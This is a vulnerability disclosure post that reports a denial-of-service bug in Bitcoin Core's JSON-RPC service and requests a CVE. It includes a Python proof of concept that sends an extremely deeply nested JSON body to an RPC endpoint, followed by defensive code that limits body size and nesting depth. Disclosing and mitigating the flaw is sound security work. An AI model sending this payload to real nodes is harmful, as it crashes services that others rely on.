Hi developers, I found a bug. When the bitcoin client's JSON RPC service is enabled, someone can send super-large JSON request data to the JSON RPC service, which can lead to DoS. It is an issue discovered in the client in Bitcoin Core through 0.17.1. It seems to affect all versions.
And I want to apply for a CVE number.
Here is the PoC:
```python
#!/usr/bin/python3
# coding = utf-8
# By Thinking@SlowMist
import requests
import random
from requests.auth import HTTPBasicAuth, HTTPDigestAuth
import json

headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Charset': 'GB2312,utf-8;q=0.7,*;q=0.7',
    'Accept-Language': 'zh-cn,zh;q=0.5',
    'Cache-Control': 'max-age=0',
    'User-Agent': 'Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.14) Gecko/20110221 Ubuntu/10.10 (maverick) Firefox/3.6.14',
    'Content-Type': 'application/json',
}
url = 'http://xxx.xxx.xxx:8888'  # replace in the RPC address and port
datas = '{"slowmist":' + '{"slowmist":' * 0xfffff + '""}' + '}' * 0xfffff
try:
    resp = requests.post(url=url, headers=headers, data=datas, auth=HTTPBasicAuth('root', 'root'))  # replace in the HTTPBasicAuth username and passwd
    print(resp.content)
except requests.exceptions.ConnectionError as e:
    print(e)
```
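The defensive counterpart to the report above, as an added example that is not part of the original post and is not Bitcoin Core code: a pre-parse guard that bounds both the size and the nesting depth of a JSON request body in one iterative pass, so a body shaped like the PoC payload is rejected before any parser sees it. The names `check_json_body` and `parse_guarded` and the limits `MAX_BODY_BYTES` and `MAX_DEPTH` are assumptions chosen for illustration.

```python
# Added example: pre-parse guard for JSON request bodies (not Bitcoin Core code).
# MAX_BODY_BYTES and MAX_DEPTH are assumed limits chosen for illustration.
import json
from typing import Tuple

MAX_BODY_BYTES = 1 << 20   # assumed cap: 1 MiB
MAX_DEPTH = 64             # assumed cap on nested objects/arrays


def check_json_body(body: bytes, max_bytes: int = MAX_BODY_BYTES,
                    max_depth: int = MAX_DEPTH) -> Tuple[bool, str]:
    """Return (ok, reason) after a single iterative pass; no recursion."""
    if len(body) > max_bytes:
        return False, "body too large"
    depth = 0
    in_string = False
    escaped = False
    for byte in body:  # UTF-8 continuation bytes never equal ASCII brackets
        ch = chr(byte)
        if in_string:
            # Brackets inside string literals do not count as nesting.
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch in "{[":
            depth += 1
            if depth > max_depth:
                return False, "nesting too deep"
        elif ch in "}]":
            depth -= 1
            if depth < 0:
                return False, "unbalanced brackets"
    if in_string or depth != 0:
        return False, "truncated or unbalanced"
    return True, "ok"


def parse_guarded(body: bytes):
    """Parse only bodies that pass the guard; raise ValueError otherwise."""
    ok, reason = check_json_body(body)
    if not ok:
        raise ValueError(f"rejected JSON body: {reason}")
    return json.loads(body)
```

The guard is a structural pre-filter only; bodies that pass it still go through the real parser, which decides validity.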